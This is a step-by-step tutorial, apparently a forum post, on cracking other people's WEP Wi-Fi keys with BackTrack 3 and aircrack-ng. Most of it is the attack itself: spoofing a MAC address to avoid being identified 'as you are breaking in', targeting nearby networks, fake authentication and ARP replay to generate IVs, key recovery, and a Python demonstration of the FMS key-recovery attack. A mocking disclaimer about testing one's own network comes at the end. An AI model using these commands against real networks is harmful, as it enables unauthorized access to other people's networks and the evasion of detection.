
Hacking WEP wifi passwords

1. Getting the right tools


Download BackTrack 3. It can be found here:
http://www.remote-exploit.org/backtrack_download.html
The BackTrack 4 beta is out, but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a CD. Insert your BT3 CD/USB drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you.
2. Preparing your wireless card and picking a target network
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:
airmon-ng
You will see the name of your wireless card. (Mine is named "ath0".) From here on out, replace "ath0" with the name of your card. Note that BT3's madwifi driver exposes two names for one Atheros card: "wifi0" is the physical radio and "ath0" is the virtual interface on top of it, which is why the commands below switch between the two. With other chipsets and drivers the names differ (for example "wlan0" plus a separate monitor interface such as "mon0"); use whatever airmon-ng reports for your card.
Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0
What these steps did was to spoof (fake) your MAC address, so that JUST IN CASE your computer is discovered by someone as you are breaking in, they will not see your REAL MAC address. Two things to keep in mind: the spoofed address is the one you must give to aireplay-ng later (its -h option), so write it down; and a spoofed MAC only hides your hardware address in the access point's association table and logs, it is not anonymity. Moving on...
Now it's time to discover some networks to break into.
Type:
airodump-ng ath0
Now you will see a list of wireless networks start to populate. Some will have a better signal than others, and it is a good idea to pick one that has a decent signal; otherwise it will take forever to crack, or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:
hold down Ctrl and tap C
This will stop airodump-ng from populating networks and will freeze the screen so that you can see the info that you need.
**Now, from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with what I tell you to take from your screen. For example: if I say to type:
-c (channel)
then don't actually type in
-c (channel)
Instead, replace that with whatever the channel number is. So, for example, you would type:
-c 6
Can't be much clearer than that... let's continue...
Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP (the ENC column). If it says WPA or any variation of WPA, then move on. You can still crack WPA with BackTrack and some other tools, but it is a whole other ball game (the IV-statistics attack used here does not apply to WPA at all), and you need to master WEP first.
Once you've decided on a network, take note of its channel number and BSSID. The BSSID is the access point's MAC address: six pairs of hex digits separated by colons (XX:XX:XX:XX:XX:XX). The channel number will be under the heading that says "CH".
Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
The FILE NAME can be whatever you want. This is simply the prefix of the file in which airodump-ng is going to store the packets you receive, to crack later. You don't even put in an extension: airodump-ng appends "-01" and ".cap" itself, so "wepkey" becomes "wepkey-01.cap". Just pick a word that you will remember. I usually make mine "wepkey" because I can always remember it.
**Side note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.
Once you've typed in that last command, the screen of airodump-ng will change and start to show your computer gathering packets. You will also see a heading marked "IV" (newer airodump-ng versions label the same column "#Data") with a number underneath it. This stands for "Initialization Vector". In WEP every data frame carries a fresh 24-bit IV in the clear, and the RC4 key used to encrypt that frame is simply the IV followed by the secret key. Because the first encrypted byte of every frame is the same known value (the 0xAA that starts the LLC/SNAP header), each captured frame hands the attacker one known IV together with one known keystream byte, and with enough of these pairs the statistical attacks in aircrack-ng (FMS and KoreK, plus PTW in aircrack-ng 0.9 and later) recover the key byte by byte. That is what "packets of info that contain clues to the password" really means. Once you gain a minimum of 5,000 of these IVs, you can try to crack the password.
I've cracked some right at 5,000 and others have taken over 60,000. How many you need depends mainly on the key length (64-bit keys fall with far fewer IVs than 128-bit keys), not on how "difficult" the key looks: the statistical attack does not care which characters the key contains.
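To make concrete what "clues to the password" means, here is an added example, written for this page and not part of the original tutorial or of aircrack-ng: a toy Fluhrer-Mantin-Shamir (FMS) attack on a 40-bit WEP key in Python, run over frames the script constructs itself. It uses only what a passive listener sees: the 3-byte IV in the clear and the first ciphertext byte, whose plaintext is always the 0xAA that opens the LLC/SNAP header. The "capture" is constructed to hold exactly the weak IVs of the form (3+B, 255, x) that FMS needs, one frame per IV. In real traffic those IVs are scattered among tens of thousands of others, which is why the original FMS attack needed millions of frames and why aircrack-ng's KoreK and PTW attacks get by with the 5,000 to 60,000 IVs quoted above. The victim key ROOT_KEY, the frame layout, and the fudge-factor depth-first search are all assumptions of this demo.

```python
"""Added example: toy FMS attack on WEP-40 over constructed frames.

WEP encrypts each frame with RC4 keyed by IV || secret key, and every payload
starts with the known byte 0xAA, so each frame leaks one keystream byte for a
known IV.  For weak IVs (3+B, 255, x) that byte reveals secret key byte B
about 5% of the time; voting over many such IVs picks out the right byte.
Not aircrack-ng's implementation; demo key and frames are constructed here."""
from collections import Counter

# LLC/SNAP header + EtherType 0x0806 (ARP): known plaintext at the start of every
# WEP payload.  FMS needs only byte 0; the rest is used to verify a recovered key.
SNAP_HEADER = bytes.fromhex("aaaa030000000806")
ROOT_KEY = bytes.fromhex("2a7d01e9b3")   # the "victim's" 40-bit key (demo value)

def rc4_ksa(key):
    """RC4 key scheduling; returns the 256-entry permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_keystream(key, n):
    """First n RC4 keystream bytes under `key`."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(root_key, iv, plaintext):
    """WEP: RC4 keyed with IV || root key (ICV omitted).  Returns (iv, ciphertext)."""
    ks = rc4_keystream(iv + root_key, len(plaintext))
    return iv, bytes(p ^ k for p, k in zip(plaintext, ks))

def capture(root_key, key_len):
    """Constructed capture: one ARP-like frame per weak IV (3+B, 255, x).
    A real capture mixes these with ~65k other IVs; only these matter to FMS."""
    frames = []
    for pos in range(3, 3 + key_len):
        for x in range(256):
            frames.append(wep_encrypt(root_key, bytes([pos, 255, x]), SNAP_HEADER))
    return frames

def fms_votes(frames, known):
    """Vote for secret key byte number len(known), given the bytes recovered so far.
    The first `pos` KSA steps depend only on the IV and the known key bytes.  If the
    state is "resolved" (S[1] + S[S[1]] == pos), then with probability ~5% the first
    keystream byte z equals the j the real KSA computes at step pos, so
    K[pos] = z - j - S[pos]."""
    pos = 3 + len(known)
    votes = Counter()
    for iv, ct in frames:
        if iv[0] != pos or iv[1] != 255:
            continue
        K = iv + known
        S = list(range(256))
        j = 0
        for i in range(pos):
            j = (j + S[i] + K[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[1] < pos and (S[1] + S[S[1]]) & 0xFF == pos:
            z = ct[0] ^ SNAP_HEADER[0]            # keystream byte 0 from known plaintext
            votes[(z - j - S[pos]) & 0xFF] += 1
    return votes

def key_is_valid(frames, key, n_frames=3):
    """Accept a candidate only if it decrypts captured frames to the SNAP header."""
    for iv, ct in frames[:n_frames]:
        ks = rc4_keystream(iv + key, len(SNAP_HEADER))
        if bytes(c ^ k for c, k in zip(ct, ks)) != SNAP_HEADER:
            return False
    return True

def fms_crack(frames, key_len, fudge=6):
    """Recover the key byte by byte.  As with aircrack-ng's fudge factor, try the
    `fudge` best-voted candidates per byte (depth first) and verify the full key."""
    def search(known):
        if len(known) == key_len:
            return known if key_is_valid(frames, known) else None
        for cand, _ in fms_votes(frames, known).most_common(fudge):
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")

def aircrack_style(key):
    """aircrack-ng's display: hex bytes joined by colons, plus the ASCII string
    only when every byte is printable.  Returns (hex_form, ascii_form_or_None)."""
    hex_form = ":".join(f"{b:02X}" for b in key)
    ascii_form = key.decode("ascii") if all(0x20 <= b < 0x7F for b in key) else None
    return hex_form, ascii_form

if __name__ == "__main__":
    frames = capture(ROOT_KEY, len(ROOT_KEY))
    recovered = fms_crack(frames, len(ROOT_KEY))
    print("weak-IV frames used:", len(frames))
    print("recovered key      :", aircrack_style(recovered))
    print("actual key         :", aircrack_style(ROOT_KEY))
```

Run directly, it recovers ROOT_KEY from 1,280 weak-IV frames and prints it in the colon-separated form aircrack-ng uses; the same code handles a 13-byte key (pass key_len=13), it just needs the weak IVs for eight more positions. The verification step matters: a single byte with an unlucky vote count would otherwise silently produce a wrong key, which is exactly the situation aircrack-ng's fudge factor exists for.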
Now you are thinking, "I'm screwed because my IVs are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IVs per second.
3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
This is a fake authentication: it associates your spoofed MAC address (the -h value must be the one you set with macchanger) with the access point, so that the access point will accept frames from you. It prints a few lines and should end by reporting that the association was successful. On its own it generates no traffic. The line described next, where your computer gathers packets and waits on ARP and ACK, comes from the ARP request replay attack, which you run in the same window once the fake authentication has succeeded:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
Don't worry too much about what ARP and ACK mean... just know that these are your meal tickets. (An ARP request can be recognised by its fixed size even though it is encrypted; each time you replay one, the access point re-encrypts and rebroadcasts it with a new IV, and every one of those is a fresh IV in your capture.) Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds... sometimes you have to wait up to a few minutes, because a legitimate client on the network has to send an ARP request first. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type:
aircrack-ng -b (bssid) wepkey-01.cap
Once you have done this, you will see aircrack-ng fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If this is the case, aircrack-ng will test what you've got so far and then report that it failed and will retry at the next milestone (around 10,000 IVs). DON'T DO ANYTHING! It will stay running; it is just letting you know that it is waiting until more IVs are gathered, and it keeps reading the capture file that airodump-ng is still writing. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say the same for 15,000, and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the password! Now, if the password looks goofy, don't worry, it will still work. A WEP "password" is really a fixed-length key: 5 bytes (40-bit, sold as "64-bit WEP") or 13 bytes (104-bit, sold as "128-bit WEP"). aircrack-ng always prints the recovered key as hex bytes separated by colons, one pair per byte. If every byte happens to be a printable character, meaning the owner typed the key in as ASCII text, aircrack-ng also prints that ASCII string next to the hex. Otherwise you only get the hex form, which is not an "encryption" of anything; it simply is the key.
So for instance, if the owner set the 5-character ASCII key "abcde", aircrack-ng shows the hex bytes
61:62:63:64:65
with "abcde" alongside. A key that was entered as hex in the first place (ten hex digits for a 64-bit key) shows up only in the colon-separated form, something like
XX:XX:XX:XX:XX
with real hex digits in place of the X's. Either form works: boot back into whatever operating system you use, try to connect to the network and type in the key, either the ASCII string exactly as shown or the hex digits with the colons removed (10 digits for a 64-bit key, 26 for a 128-bit key), and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts you will get very quick with it. If I am near a WEP-encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you because... technically... this is just for you to test the security of your own network. :-)
I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this... read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP encryption with SKA (Shared Key Authentication) as well. If this is the case, additional steps are needed to associate with the router, and therefore the steps I lined out here will not work: with SKA the access point sends a challenge that the client must encrypt with the WEP key before it is allowed to associate, so the open-system fake authentication in step 3 is rejected and the ARP replay never starts. airodump-ng marks such networks with "SKA" in its AUTH column. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
